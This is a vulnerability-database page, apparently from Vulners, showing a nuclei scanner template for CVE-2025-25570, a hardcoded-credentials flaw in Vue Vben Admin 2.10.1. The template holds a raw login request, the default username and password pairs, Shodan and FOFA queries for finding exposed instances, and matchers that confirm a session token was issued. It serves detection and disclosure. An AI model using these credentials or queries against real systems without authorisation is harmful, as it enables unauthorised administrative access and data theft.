Lucene search
K

Vue Vben Admin - Default Credentials

🗓️ 09 Jul 2026 03:01:09Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Vue Vben Admin 2.10.1 has hardcoded backend credentials enabling unauthorized login.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-25570
28 Feb 202501:08
circl
CNNVD
Vben-Admin 安全漏洞
27 Feb 202500:00
cnnvd
CVE
CVE-2025-25570
27 Feb 202500:00
cve
Cvelist
CVE-2025-25570
27 Feb 202500:00
cvelist
EUVD
EUVD-2025-5494
3 Oct 202520:07
euvd
NVD
CVE-2025-25570
27 Feb 202522:15
nvd
Positive Technologies
PT-2025-9029
27 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2025-25570
1 Mar 202500:26
redhatcve
The Hacker News
⚡ THN Weekly Recap: Alerts on Zero-Day Exploits, AI Breaches, and Crypto Heists
3 Mar 202511:58
thn
Vulnrichment
CVE-2025-25570
27 Feb 202500:00
vulnrichment
Rows per page
id: CVE-2025-25570

info:
  name: Vue Vben Admin - Default Credentials
  author: 0x_Akoko
  severity: critical
  description: |
    Vue Vben Admin 2.10.1 contains a broken authentication caused by hardcoded credentials in the backend, letting attackers log in without proper authorization, exploit requires access to the login interface.
  impact: |
    Attackers can gain unauthorized access to the backend, potentially leading to data theft or system control
  remediation: |
    Remove hardcoded credentials and implement proper authentication mechanisms, update to the latest version if available.
  reference:
    - https://github.com/vbenjs/vue-vben-admin
    - https://doc.vvbin.cn/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-25570
    epss-score: 0.01999
    epss-percentile: 0.78356
    cwe-id: CWE-798
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"vben" || http.html:"vue-vben-admin"
    fofa-query: body="vben" || body="vue-vben-admin"
  tags: cve,cve2025,vben,vue,default-login,credentials

http:
  - raw:
      - |
        POST {{BaseURL}}/basic-api/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"username":"{{username}}","password":"{{password}}"}

    attack: clusterbomb
    payloads:
      username:
        - "vben"
        - "test"
      password:
        - "123456"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "\"code\":0", "\"type\":\"success\"", "\"result\":", "\"token\":")'
          - 'contains_any(body, "Vben Admin", "Super Admin")'
        condition: and
# digest: 4a0a0047304502205244f23a80eaeb723b8cf8b909bb36a1f108af6a75811e739d40b15e595a92690221009e8ca17a56a33205a6cb25a60c5120e31d0555c482c5e3237d929a2e9aed1be9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.01999
SSVC
26